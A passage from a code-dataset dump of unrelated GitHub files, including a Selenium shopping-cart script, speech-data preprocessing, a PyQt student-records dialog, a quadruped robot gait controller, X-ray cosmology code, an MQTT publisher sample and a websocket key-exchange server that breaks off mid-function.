= WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (\n                By.CSS_SELECTOR,\n                \"#recommendrecommend > div > div:nth-child(1) > div.product__wrapper > div.product-menu > \"\n                \"div.product-actions > button > div\",\n            )\n        )\n    )\n    product_add.click()\n    print(\"clicked add to cart\")\n\n    # Click the cart button\n    basket = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (\n                By.CSS_SELECTOR,\n                \"#app > div.pe-none.cart-button.container > div > div > div > button\",\n            )\n        )\n    )\n    basket.click()\n    print(\"Clicked the cart\")\n\n    # Select the cart element\n    time.sleep(\n        1\n    )  # Without a wait the cart does not fully load, hence the time.sleep\n    screen = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (\n                By.CSS_SELECTOR,\n                \"#app > div.pe-none.cart-button.container > div > div > div.popover__content\",\n            )\n        )\n    )\n    screen.screenshot(\"./image/basket_image.png\")\n    print(\"saved a screenshot of the cart\")\n\nexcept Exception as ex:\n    print(ex)\nfinally:\n    driver.close()\n    driver.quit()\n","repo_name":"SuNseTgReeN/FoodSoul","sub_path":"main_telegram.py","file_name":"main_telegram.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70914946810","text":"from pathlib import Path\nimport json, datetime\n\n\ndef checkIfFileExists(filename):\n    my_file = Path(filename)\n    if my_file.is_file():\n        return True\n    else:\n        return False\n\ndef writeJson(file, list):\n    print(datetime.datetime.now().isoformat() + \" ##### CommonService: Write to file \" + file + \" #####\")\n    listDTO = json.dumps(list, ensure_ascii=False, default=lambda o: o.__dict__,\n                         sort_keys=False, indent=4)\n    with open(file, 'w') as json_file:\n        json_file.write(listDTO + '\\n')","repo_name":"mariomaf/bot","sub_path":"services/CommonServices.py","file_name":"CommonServices.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1715285969","text":"import numpy as np\nimport os\nimport audio\n\nfrom tqdm import tqdm\nfrom functools import partial\nfrom concurrent.futures import ProcessPoolExecutor\n\n\ndef build_from_path(in_dir, out_dir):\n    index = 1\n    # executor = ProcessPoolExecutor(max_workers=4)\n    # futures = []\n    texts = []\n\n    with open(os.path.join(in_dir, 'metadata.csv'), encoding='utf-8') as f:\n        for line in f.readlines():\n            if index % 100 == 0:\n                print(\"{:d} Done\".format(index))\n            parts = line.strip().split('|')\n            
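# Each metadata.csv row is assumed to follow the LJSpeech layout\n            # id|raw_text|normalized_text, so parts[0] is the clip id and\n            # parts[2] the normalized transcript (editor's note).\n            wav_path = os.path.join(in_dir, 'wavs', '%s.wav' % parts[0])\n            text = 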
parts[2]\n            # futures.append(executor.submit(\n            #     partial(_process_utterance, out_dir, index, wav_path, text)))\n            texts.append(_process_utterance(out_dir, index, wav_path, text))\n\n            index = index + 1\n\n    # return [future.result() for future in tqdm(futures)]\n    return texts\n\n\ndef _process_utterance(out_dir, index, wav_path, text):\n    # Compute a mel-scale spectrogram from the wav:\n    mel_spectrogram = audio.tools.get_mel(wav_path).numpy().astype(np.float32)\n\n    # Write the spectrograms to disk:\n    mel_filename = 'ljspeech-mel-%05d.npy' % index\n    np.save(os.path.join(out_dir, mel_filename),\n            mel_spectrogram.T, allow_pickle=False)\n\n    return text\n","repo_name":"xcmyz/FastSpeech","sub_path":"data/ljspeech.py","file_name":"ljspeech.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":822,"dataset":"github-code","pt":"77"} +{"seq_id":"17143194502","text":"# Main window for personal information collection\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nfrom sklearn import neighbors\nimport os\nimport os.path\nimport pickle\nfrom PIL import Image, ImageDraw\nimport face_recognition\nfrom face_recognition.face_recognition_cli import image_files_in_folder\nimport cv2\nimport pandas as pd\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nfrom PyQt5.QtCore import QTimer, QDateTime, QCoreApplication, QThread\nfrom PyQt5.QtGui import QImage, QIcon, QPixmap\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMessageBox, QInputDialog\nimport sys\nfrom datetime import datetime\nimport imutils\n\nimport UI.information_gui as information_gui\nimport information_collection as information_collection\nimport global_value\n\n\nclass InfoDialog(QWidget):\n    def __init__(self):\n        # super() returns the parent object; __init__() is one of its constructor methods.\n        super().__init__()\n\n        self.Dialog = information_gui.Ui_Form()\n        self.Dialog.setupUi(self)\n\n        # Report path errors to make them easier to locate\n        self.current_filename = os.path.basename(__file__)\n\n        try:\n            # Set the window title and icon\n            self.setWindowTitle('Personal Information Collection')\n            self.setWindowIcon(QIcon(\n                f'/Users/fanzitian/Library/Mobile Documents/com~apple~CloudDocs/CODE/Python_code/2022_robot_CurriculumDesign/logo_imgs/fcb_logo.jpg'))\n\n        except FileNotFoundError as e:\n            print(\"[ERROR] UI background image path is incorrect! (source file: {})\".format(\n                self.current_filename), e)\n\n        # Connect the collection button to its handler\n        self.Dialog.bt_start_collect.clicked.connect(self.open_camera)\n        # Connect the query-info button to its handler\n        self.Dialog.bt_check_info.clicked.connect(self.check_info)\n        # Connect the edit-info button to its handler\n        self.Dialog.bt_change_info.clicked.connect(self.change_info)\n        # Connect the add-info button to its handler\n        self.Dialog.bt_add_info.clicked.connect(self.add_info)\n\n        # Initialize the camera\n        self.cap = cv2.VideoCapture(0)\n\n    def handle_click(self):\n        if not self.isVisible():\n            self.show()\n\n    def handle_close(self):\n        self.close()\n\n    def open_camera(self):\n        self.dialog_text_id, ok_1 = QInputDialog.getText(\n            self, 'Create personal image database', 'Enter student ID:')\n        self.dialog_text_name, ok_2 = QInputDialog.getText(\n            self, 'Create personal image database', 'Enter name:')\n        if ok_1 & ok_2:\n            self.Dialog.label_capture.clear()\n            self.cap.open(0)\n\n            self.Dialog.label_capture.clear()\n            print(\"[INFO] starting video stream...\")\n\n            information_collection.CatchPICFromVideo(\n                \"get face\", 0, 99, self.dialog_text_name, self.dialog_text_id)\n\n    def check_info(self):\n        dict_from_csv = pd.read_csv('students_data.csv').to_dict()\n\n        name = self.Dialog.lineEdit_name.text()\n        student_id = int(self.Dialog.lineEdit_id.text())\n        result_number = list(dict_from_csv['id'].values()).index(student_id)\n        self.Dialog.tableView.append('{} {} {} {} Student info query succeeded!'.format(\n            
dict_from_csv['name'][result_number], dict_from_csv['id'][result_number],\n            dict_from_csv['absenteeism'][result_number], dict_from_csv['attendance_rate'][result_number]))\n\n    def add_info(self):\n        dict_from_csv = pd.read_csv('students_data.csv').to_dict()\n        # Create an empty dict\n        new_student_info = {}\n        # Read the student info from the input fields\n        new_student_info['name'] = self.Dialog.lineEdit_name.text()\n        new_student_info['id'] = self.Dialog.lineEdit_id.text()\n        new_student_info['absenteeism'] = 0\n        new_student_info['attendance_rate'] = 0.0\n        # Add the student info to the dict\n        dict_from_csv['name'][len(dict_from_csv['name'])] = (\n            new_student_info['name'])\n        dict_from_csv['id'][len(dict_from_csv['id'])] = (\n            new_student_info['id'])\n        dict_from_csv['absenteeism'][len(dict_from_csv['absenteeism'])] = (\n            new_student_info['absenteeism'])\n        dict_from_csv['attendance_rate'][len(dict_from_csv['attendance_rate'])] = (\n            new_student_info['attendance_rate'])\n        # Write the dict back to the csv file (index=False is an editor's fix: the\n        # original wrote the index, adding an extra unnamed column on every save)\n        pd.DataFrame(dict_from_csv).to_csv('students_data.csv', index=False)\n        self.Dialog.tableView.append('{} {} Student info added successfully!'.format(\n            new_student_info['name'], new_student_info['id']))\n\n    def change_info(self):\n        dict_from_csv = pd.read_csv('students_data.csv')\n        # Read the name of the student to modify\n        name = self.Dialog.lineEdit_name.text()\n        \n        dict_from_csv = dict_from_csv.drop([list(\n            (dict_from_csv.to_dict())['name'].values()).index(name)])\n        dict_from_csv = dict_from_csv.to_dict()\n        \n        # Read the new student info\n        new_student_info = {}\n        new_student_info['name'], ok = QInputDialog.getText(\n            self, 'Edit student info', 'Enter the student name:')\n        new_student_info['id'], ok = QInputDialog.getText(\n            self, 'Edit student info', 'Enter the student ID:')\n        str_absenteeism, ok = QInputDialog.getText(\n            self, 'Edit student info', 'Enter the number of absences:')\n        new_student_info['absenteeism'] = int(str_absenteeism)\n        new_student_info['attendance_rate'] = (\n            1 - (new_student_info['absenteeism']) / global_value.number_of_courses)\n\n        # Add the student info to the dict\n        dict_from_csv['name'][len(dict_from_csv['name'])] = (\n            new_student_info['name'])\n        dict_from_csv['id'][len(dict_from_csv['id'])] = (\n            new_student_info['id'])\n        dict_from_csv['absenteeism'][len(dict_from_csv['absenteeism'])] = (\n            new_student_info['absenteeism'])\n        dict_from_csv['attendance_rate'][len(dict_from_csv['attendance_rate'])] = (\n            new_student_info['attendance_rate'])\n        # Write the dict back to the csv file\n        pd.DataFrame(dict_from_csv).to_csv('students_data.csv', index=False)\n        self.Dialog.tableView.append('{} {} {} {} Student info updated successfully!'.format(\n            new_student_info['name'], new_student_info['id'], new_student_info['absenteeism'], new_student_info['attendance_rate']))\n\n    def closeEvent(self, event):\n        reply = QMessageBox.question(\n            self, 'Message', 'Are you sure to quit?', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n        if reply == QMessageBox.Yes:\n            event.accept()\n        else:\n            event.ignore()\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    infowindow = InfoDialog()\n    infowindow.show()\n    sys.exit(app.exec_())\n","repo_name":"jamestian118/2022_robot_CurriculumDesign","sub_path":"Dialog/InfoDialog.py","file_name":"InfoDialog.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75063680569","text":"from numpy import array,sign,linspace,pi\nfrom threading import Thread\nfrom LegModel import LegModel\nfrom time import sleep\n\nclass QModel(Thread):\n    def __init__(self,legs_lengths,legs_positions,legs_base_angles,*args,**kwargs):\n        assert len(legs_lengths)==len(legs_positions)==len(legs_base_angles), \"Number of legs mismatch\"\n        super().__init__(*args,**kwargs)\n        self.legs = [\n            
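# One LegModel per leg, built from the parallel lists of lengths,\n            # positions and base angles (editor's note).\n            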
LegModel(length, position, angle_base)\n            for length, position, angle_base\n            in zip(legs_lengths,legs_positions, legs_base_angles)\n        ]\n        self._updater = None\n        self.__input = None\n        self.__walk_phase = 0.\n        self.__updates_per_phase = 25\n        self.__gaint_offset = array([2,0.5,-1.])\n        self.__gaint_offset_up = 0.75\n        self.__d = 8\n        self.__ds = (self.__d-1.)/self.__d\n        self.__legs_shift = [0. , 0.75, 0.50, 0.25]\n        def _sign(x):\n            t = sign(x)\n            t[t==0] = 1\n            return t\n        self.gaint_pattern_base = array([\n            [\n                leg.position + (_sign(leg.position)*self.__gaint_offset ),\n                leg.position + (_sign(leg.position)*self.__gaint_offset )\n            ]\n            for leg in self.legs\n        ])\n        self.gaint_pattern_base = array([\n            [\n                _sign(leg.position)*[4,4,-1.],\n                _sign(leg.position)*[4,4,-1.]\n            ]\n            for leg in self.legs\n        ])\n        self.rotate_d = array([\n            [ [-1,1],[1,-1] ],\n            [ [-1,-1],[1,1] ],\n            [ [1,-1],[-1,1] ],\n            [ [1,1],[-1,-1] ],\n        ])*-1\n        self.rotate_h = array([\n            [1,1],[-1,1],[-1,-1],[1,-1]\n        ])\n        self.advance_max, self.side_max, self.rotate_max = 1.3,.75,.5\n\n\n\n    def set_updater(self,fnc):\n        self._updater = fnc\n\n    def set_user_input(self,inp):\n        self.__input = inp\n\n    def fk(self,angles,*args,**kwargs): return [ leg.forward_kinetics(angle,*args,**kwargs) for leg,angle in zip(self.legs,angles)]\n    def ik(self,points,update=True,*args,**kwargs): return array([ leg.inverse_kinetics(point,update=update,*args,**kwargs) for leg,point in zip(self.legs,points) ])\n\n    def __call__(self,points=None,angles=None,update=True,*args,**kwargs):\n        if self._updater:\n            if points is not None:\n                return self._updater(self.ik(points,update=update,*args,**kwargs))\n            elif angles is not None:\n                if update:\n                    for leg,angle in zip(self.legs, angles):\n                        leg.current = angle\n                return self._updater(angles)\n        else: raise Exception('Set updater first!')\n\n    def run(self):\n        # Init walk\n        ## Each leg center point\n        gaint_pattern = self.gaint_pattern_base.copy()\n        ## Calculate each leg angles for center point and go there\n        legs_base_angles = array([\n            leg(target=gp[0],starting_angles=[0.,1.,-2.])\n            for leg,gp in zip(self.legs,gaint_pattern)\n        ])\n        ## Calculate update interval, steps etc.\n        interval = 1 / self.__updates_per_phase\n        phase_steps = linspace(0,1,self.__updates_per_phase)\n        ## Start input reader\n        self.__input.start()\n        ## Get current input state\n        last_state = self.__input.state\n        # Main loop\n        while True:\n            if len(self.__input.button_down)==0:\n                for phase_step in phase_steps:\n                    ## Get input\n                    state = self.__input.state\n                    ## Do we need to update gaint pattern\n                    if last_state != state:\n                        advance, side, rotate, height, gx, gy = state\n                        ## OK, let's update\n                        gaint_pattern = self.gaint_pattern_base.copy()\n                        for gp,rd,rh in zip(gaint_pattern,self.rotate_d,self.rotate_h):\n                            gp[0][1] += advance*self.advance_max\n                            gp[1][1] -= advance*self.advance_max\n                            gp[0][0] += side*self.side_max\n                            gp[1][0] -= side*self.side_max\n                            gp[0][0] += rotate*self.rotate_max*rd[0][0]\n                            gp[0][1] += rotate*self.rotate_max*rd[0][1]\n                            gp[1][0] += rotate*self.rotate_max*rd[1][0]\n                            gp[1][1] += rotate*self.rotate_max*rd[1][1]\n                            gp[0][2] = -height*2.5\n                            gp[1][2] = -height*2.5\n\n                            gp[0][0] += gx\n                            gp[1][0] += gx\n                            gp[0][1] += gy\n                            gp[1][1] += gy\n\n                            # gp[0][2] += rh[0]*gx + rh[1]*gy\n                            # gp[1][2] += rh[0]*gx + rh[1]*gy\n\n                        legs_base_angles = array([\n                            leg(target=gp[0],starting_angles=[0.,1.,-2.])\n                            for leg,gp in zip(self.legs,gaint_pattern)\n                        ])\n                        last_state = state\n                    ## Do we have any velocity\n                    all_angels = []\n                    if state[0] != 0 or state[1] != 0 or state[2] != 0:\n                        ### OK, let's move to new angles\n                        
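### Gait note (editor's reading): every leg runs the same cycle offset\n                        ### by __legs_shift; the final 1/d of the cycle is the swing phase\n                        ### (leg lifted), the rest is the stance phase.\n                        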
for leg,leg_shift,gp,leg_base_angles in zip(self.legs,self.__legs_shift,gaint_pattern,legs_base_angles):\n                            leg_phase = leg_shift + phase_step\n                            if leg_phase > 1.: leg_phase -= 1\n                            if leg_phase > self.__ds:\n                                leg_p,leg_up = -self.__d*leg_phase+self.__d, True\n                            else:\n                                leg_p,leg_up = leg_phase/self.__ds, False\n                            target = array([\n                                gp[0][0]*(1.-leg_p) + gp[1][0]*leg_p,\n                                gp[0][1]*(1.-leg_p) + gp[1][1]*leg_p,\n                                gp[0][2]\n                            ])\n                            if leg_up: target[2] = 0 # self.__gaint_offset_up\n                            angels = leg(target=target,starting_angles = leg_base_angles)\n                            for a in angels: all_angels.append(a)\n                    self._updater(all_angels)\n                    sleep(interval)\n                else:\n                    self._updater(legs_base_angles)\n                    sleep(interval)\n                    break\n            else:\n                angel = list(self.__input.state[0:3])\n                angel = [-angel[2]*pi/2,-angel[0]*pi/2,angel[1]*pi/2]\n                angels = legs_base_angles.copy()\n\n                if 1 in self.__input.button_down:\n                    angel[0] += 1\n                    angel[1] += 1\n                    angel[2] += -1\n                    angels[0] = angel\n                    angels[1][0] = -1.\n\n                if 5 in self.__input.button_down:\n                    angels[0] = angel\n                if 4 in self.__input.button_down:\n                    angels[1] = angel\n                if 2 in self.__input.button_down:\n                    angels[2] = angel\n                if 3 in self.__input.button_down:\n                    angels[3] = angel\n                self._updater(angels)\n                sleep(interval)\n        self.__input.stop()\n\nif __name__ == \"__main__\":\n    from JoystickInput import JoystickInput\n    from configs import my_quad as config\n    from q_controller import set_angles\n\n    try:\n        MyQuadrupet = QModel(*config)\n        MyQuadrupet.set_user_input(JoystickInput())\n        MyQuadrupet.set_updater(set_angles)\n        MyQuadrupet.start()\n\n    except KeyboardInterrupt: pass\n","repo_name":"cb1986ster/Scout","sub_path":"QModel.py","file_name":"QModel.py","file_ext":"py","file_size_in_byte":7806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11999578184","text":"\"\"\"\n\nXray structure, helper functions, and definitions\n\nAuthor: Julian B. Muñoz\nUT Austin and Harvard CfA - January 2023\n\n\"\"\"\n\nimport numpy as np\nfrom . import constants\nfrom .cosmology import n_baryon, HubinvMpc\n\n\nclass Xray_class:\n    \"Class containing the X-ray functions that we want to pass to main calculation\"\n\n    def __init__(self, Cosmo_Parameters):\n\n        self.atomfractions = np.array([Cosmo_Parameters.f_H,Cosmo_Parameters.f_He]) # fraction of baryons in HI and HeI, assumed to just be the avg cosmic\n        self.atomEnIon = np.array([constants.EN_ION_HI, constants.EN_ION_HeI]) # threshold energies for each, in eV\n        self.TAUMAX=100. # max optical depth, cut to 0 after to avoid overflows\n\n\n    def optical_depth(self, Cosmo_Parameters, En,z,zp):\n        \"Function that calculates the optical depth for a photon of energy En/eV from z to zp\"\n        Nzinttau = np.floor(10*constants.precisionboost).astype(int)\n        # surprisingly it converges very quickly, since things are smooth functions of nu/z. 
Warning, make sure to tweak if SED is not a powerlaw!\n\n Envec = np.asarray([En]) if np.isscalar(En) else np.asarray(En)\n\n zinttau = np.linspace(z,zp,Nzinttau)\n\n\n Eninttautab = np.outer((1+zinttau)/(1+z) , Envec)\n\n sigmatot = self.atomfractions[0] * sigma_HI(Eninttautab)\n sigmatot += self.atomfractions[1] * sigma_HeI(Eninttautab)\n sigmatot = sigmatot.T #to broadcast below\n\n integrand = 1.0/HubinvMpc(Cosmo_Parameters, zinttau)/(1+zinttau) * sigmatot * n_baryon(Cosmo_Parameters, zinttau) * constants.Mpctocm\n taulist = np.trapz(integrand, zinttau, axis=1)\n\n #OLD: kept for reference only.\n # taulist = 1.0*np.zeros_like(Envec)\n # for iE, Energy in enumerate(Envec):\n # Eninttau = (1+zinttau)/(1+z) * Energy\n # sigmatot = self.atomfractions[0] * sigma_HI(Eninttau)\n # sigmatot += self.atomfractions[1] * sigma_HeI(Eninttau)\n # #we ignore HeII since it's a small correction (Pritchard and Furlanetto 06)\n #\n # integrand = 1.0/HubinvMpc(Cosmo_Parameters, zinttau)/(1+zinttau) * sigmatot * n_baryon(Cosmo_Parameters, zinttau) * constants.Mpctocm\n #\n # taulist[iE] = np.trapz(integrand, zinttau)\n\n indextautoolarge = np.array(taulist>=self.TAUMAX)\n taulist [indextautoolarge] = self.TAUMAX\n return taulist\n\n\n\n\n def opacity_Xray(self, Cosmo_Parameters, En,z,zp):\n \"Returns opacity, see optical_depth() for the hard calculation.\"\n\n XRAY_OPACITY_MODEL = Cosmo_Parameters.Flag_emulate_21cmfast\n #important, 0 = standard, 1=21cmfast-like (step at tau=1)\n\n\n if(XRAY_OPACITY_MODEL==0): #0 is standard/regular.\n return np.exp(-self.optical_depth(Cosmo_Parameters,En,z,zp))\n elif (XRAY_OPACITY_MODEL==1): #1 is 21cmFAST-like (step-wise exp(-tau), either 1 or 0)\n return np.heaviside(1.0 - self.optical_depth(Cosmo_Parameters,En,z,zp), 0.5)\n else:\n print('ERROR, choose a correct XRAY_OPACITY_MODEL')\n\n\n def lambda_Xray_com(self, Cosmo_Parameters, En,z):\n \"Returns the mean free path in cMpc of an Xray of energy En/eV near z. Unused but good cross check\"\n\n sigmatot = self.atomfractions[0] * sigma_HI(En)\n sigmatot += self.atomfractions[1] * sigma_HeI(En)\n\n return (1.0/(sigmatot * n_baryon(Cosmo_Parameters,z))/constants.Mpctocm*(1+z) )\n\n\n\n\ndef sigma_HI(Energyin):\n \"cross section for Xray absorption for neutral HI, from astro-ph/9601009 and takes Energy in eV and returns cross sec in cm^2\"\n E0 = 4.298e-1\n sigma0 = 5.475e4\n ya = 3.288e1\n P = 2.963\n yw = 0.0\n y0 = 0.0\n y1 = 0.0\n\n Energy = Energyin\n\n warning_lowE_HIXray = np.heaviside(13.6 - Energy, 0.5)\n if(np.sum(warning_lowE_HIXray) > 0):\n print('ERROR! Some energies for Xrays below HI threshold in sigma_HI. Too low!')\n\n\n x = Energy/E0 - y0\n y = np.sqrt(x**2 + y1**2)\n Fy = ((x-1.0)**2 + yw**2) * y**(0.5*P - 5.5) * (1.0+np.sqrt(y/ya))**(-P)\n\n return sigma0 * constants.sigma0norm * Fy\n\n\n\ndef sigma_HeI(Energyin):\n \"same as sigma_HI but for HeI, parameters are:\"\n E0 = 13.61\n sigma0 = 9.492e2\n ya = 1.469\n P = 3.188\n yw = 2.039\n y0 = 4.434e-1\n y1 = 2.136\n\n Energy = Energyin\n warning_lowE_HeIXray = np.heaviside(25. - Energy, 0.5)\n if(np.sum(warning_lowE_HeIXray) > 0):\n print('ERROR! Some energies for Xrays below HeI threshold in sigma_HeI. 
Too low!')\n\n\n x = Energy/E0 - y0\n y = np.sqrt(x**2 + y1**2)\n Fy = ((x-1.0)**2 + yw**2) * y**(0.5*P - 5.5) * (1.0+np.sqrt(y/ya))**(-P)\n\n return sigma0 * constants.sigma0norm * Fy\n","repo_name":"JulianBMunoz/Zeus21","sub_path":"zeus21/xrays.py","file_name":"xrays.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"36321495628","text":"import logging\nimport anyio\n\nfrom moat.mqtt.client import open_mqttclient, ConnectException\n\n\n#\n# This sample shows how to publish messages to broker using different QOS\n# Debug outputs shows the message flows\n#\n\nlogger = logging.getLogger(__name__)\n\n\nasync def test_coro():\n try:\n async with open_mqttclient() as C:\n await C.connect(\"mqtt://0.0.0.0:1883\")\n\n await C.publish(\"data/classified\", b\"TOP SECRET\", qos=0x01)\n await C.publish(\"data/memes\", b\"REAL FUN\", qos=0x01)\n await C.publish(\n \"repositories/mqtt/master\", b\"NEW STABLE RELEASE\", qos=0x01\n )\n await C.publish(\n \"repositories/mqtt/devel\", b\"THIS NEEDS TO BE CHECKED\", qos=0x01\n )\n await C.publish(\"calendar/mqtt/releases\", b\"NEW RELEASE\", qos=0x01)\n logger.info(\"messages published\")\n except ConnectException as ce:\n logger.error(\"Connection failed: %r\", ce)\n\n\nif __name__ == \"__main__\":\n formatter = (\n \"[%(asctime)s] %(name)s {%(filename)s:%(lineno)d} %(levelname)s - %(message)s\"\n )\n formatter = \"%(message)s\"\n logging.basicConfig(level=logging.DEBUG, format=formatter)\n anyio.run(test_coro)\n","repo_name":"M-o-a-T/moat-mqtt","sub_path":"samples/client_publish_acl.py","file_name":"client_publish_acl.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"17600887242","text":"# Layer capabilities, for bitwise operations\nQUERYABLE = 1\nFILTRABLE = 2\nEDITABLE = 4\nWFS = 4\n\nVECTOR_URL = '/vector/api/'\n\n# Layer edit options, , for bitwise operations\nINSERT = 1\nUPDATE = 2\nDELETE = 4\n\n# Tilestache config base\nTILESTACHE_CONFIG_BASE = {\n \"cache\": {\n\t\"name\": \"Disk\",\n \"path\": \"/tmp/stache\",\n \"umask\": \"0000\",\n \"dirs\": \"portable\",\n \"gzip\": [\"xml\", \"json\"]\n },\n \"layers\": {},\n \"logging\": \"debug\"\n}","repo_name":"comunedibari/SIT","sub_path":"sorgenti/g3w-admin-v.3.2/g3w-admin/base/settings/base_geo_settings.py","file_name":"base_geo_settings.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74661002808","text":"from sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy import func\nfrom server.exceptions import (\n IconNotSupportedException,\n TransferUsageNameDuplicateException\n)\nfrom server.constants import (\n MATERIAL_COMMUNITY_ICONS\n)\n\nfrom server import db\nfrom server.models.utils import ModelBase, credit_transfer_transfer_usage_association_table\n\nclass TransferUsage(ModelBase):\n __tablename__ = 'transfer_usage'\n\n _name = db.Column(db.String, unique=True, index=True)\n is_cashout = db.Column(db.Boolean)\n _icon = db.Column(db.String)\n priority = db.Column(db.Integer)\n translations = db.Column(JSON)\n default = db.Column(db.Boolean)\n\n users = db.relationship('User', backref='business_usage', lazy=True)\n\n credit_transfers = db.relationship(\n \"CreditTransfer\",\n 
secondary=credit_transfer_transfer_usage_association_table,\n back_populates=\"transfer_usages\",\n )\n\n @hybrid_property\n def icon(self):\n return self._icon\n\n @icon.setter\n def icon(self, icon):\n if icon not in MATERIAL_COMMUNITY_ICONS:\n raise IconNotSupportedException(f'Icon {icon} not supported or found')\n self._icon = icon\n\n @hybrid_property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, name):\n stripped_name = name.strip()\n exists = db.session.query(TransferUsage.id).filter(\n func.lower(TransferUsage.name) == func.lower(stripped_name)).scalar() is not None\n if not exists:\n self._name = stripped_name\n else:\n raise TransferUsageNameDuplicateException(\n 'Transfer usage name {} is duplicate'.format(name))\n\n @classmethod\n def find_or_create(cls, raw_name, default=False, **kwargs) -> \"TransferUsage\":\n name = raw_name.strip()\n usage = db.session.query(TransferUsage).filter(\n func.lower(TransferUsage.name) == func.lower(name)).first()\n if usage is None:\n usage = cls(name=name, default=default, **kwargs)\n db.session.add(usage)\n db.session.flush()\n return usage\n\n def __repr__(self):\n return f''","repo_name":"teamsempo/SempoBlockchain","sub_path":"app/server/models/transfer_usage.py","file_name":"transfer_usage.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"77"} +{"seq_id":"11681087563","text":"from __future__ import annotations\nfrom typing import TYPE_CHECKING\nfrom game.piece.movement import PieceMovement\nfrom utils import BoardVector2d, Symmetry\n\nif TYPE_CHECKING:\n from game.piece.piece import Piece\n from game.board import Board\n\n\nclass KnightMovement(PieceMovement):\n def __init__(self, knight: Piece, board: Board) -> None:\n super().__init__(knight, board)\n\n # override\n def get_all_moves(self) -> list[list[BoardVector2d]]:\n moves: list[[BoardVector2d]] = [[]]\n\n base_vectors = [BoardVector2d(1, 2), BoardVector2d(2, 1)]\n pos = self._piece.position\n symmetries = [None, Symmetry.X_AXIS, Symmetry.ORIGIN, Symmetry.Y_AXIS]\n positions = [pos + v.pivot_symmetry(s) if s is not None else pos + v for v in base_vectors for s in symmetries]\n\n for p in positions:\n if not self._board.is_out_of_bounds(p):\n moves[0].append(p)\n\n return moves\n\n # override\n def get_legal_moves(self) -> list[list[BoardVector2d]]:\n self._legal_moves.clear()\n self._legal_moves.append([])\n\n for m in self.get_all_moves()[0]:\n if self._board.can_move_to(m, self._piece, capture=True):\n self._legal_moves[0].append(m)\n\n return self._legal_moves\n\n","repo_name":"agh-cs-imbeciles/python-laser-chess","sub_path":"src/game/piece/movement/knight_movement.py","file_name":"knight_movement.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42543538257","text":"from __future__ import absolute_import\nimport os\nfrom celery import Celery\nfrom django.conf import settings\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','terminal.settings')\napp = Celery('terminal')\napp.config_from_object('django.conf:settings')\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\napp.conf.beat_schedule = {\n 'delete-expired-urls': {\n 'task': 'apps.endpoints.tasks.delete_expired_urls',\n 'schedule': 1800,\n 
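    # celery beat 'schedule' values are in seconds: 1800 s = every 30 minutes (editor's note)\n    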
},\n}\n","repo_name":"vediprashant/terminal_api","sub_path":"terminal/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22163522598","text":"import json\nimport logging\n\nimport threading\nfrom websocket_server import WebsocketServer\nfrom logic import *\nfrom time import sleep\n# from flask_cors import CORS\n# from flask_socketio import SocketIO, emit\n# from flask_sockets import Sockets\nimport base64\n\nusernames = dict()\nserver_private_keys = dict()\nserver_new_private_keys = dict()\nclient_public_keys = dict()\n\n# Single shared lock guarding the key dictionaries. Editor's fix: the original\n# created a fresh Lock at every call site, so the locking never synchronized\n# anything.\nKEYS_LOCK = threading.Lock()\n\n\ndef encode_public_keynumbers(pbkn):\n    e = base64.b64encode(int_to_bytes(pbkn.e)).decode('ascii')\n    n = base64.b64encode(int_to_bytes(pbkn.n)).decode('ascii')\n    return e, n\n\n\ndef decode_public_keynumbers(eb64, nb64):\n    eb = base64.b64decode(eb64)\n    nb = base64.b64decode(nb64)\n    e = int_from_bytes(eb)\n    n = int_from_bytes(nb)\n    return e, n\n\n\ndef int_to_bytes(x):\n    return x.to_bytes((x.bit_length() + 7) // 8, 'big')\n\n\ndef int_from_bytes(xbytes):\n    return int.from_bytes(xbytes, 'big')\n\n\ndef format_message(event, data, message_blocks=[]):\n    message = {\n        \"event_type\": event,\n        \"message_blocks\": message_blocks,\n        \"data\": data\n    }\n    return json.dumps(message)\n\n\n# app = Flask(__name__)\n# app.debug = True\n# sockets = Sockets(app)\ndef on_new_client(client, server):\n    print(client['id'], client['address'], sep='|')\n\n\ndef on_message(client, server, message):\n    msg = json.loads(message)\n    event = msg[\"event_type\"]\n    handler = handlers[event]\n    handler(client, msg)\n\n\ndef on_register(client, msg):\n    data = msg['data']\n    client_id = client['id']\n    if client_id in usernames:\n        server.send_message(client, format_message('registration_fail', {}))\n        return\n    username = data['username']\n    eb64, nb64 = data['e'], data['n']\n\n    usernames[client_id] = username\n\n    e, n = decode_public_keynumbers(eb64, 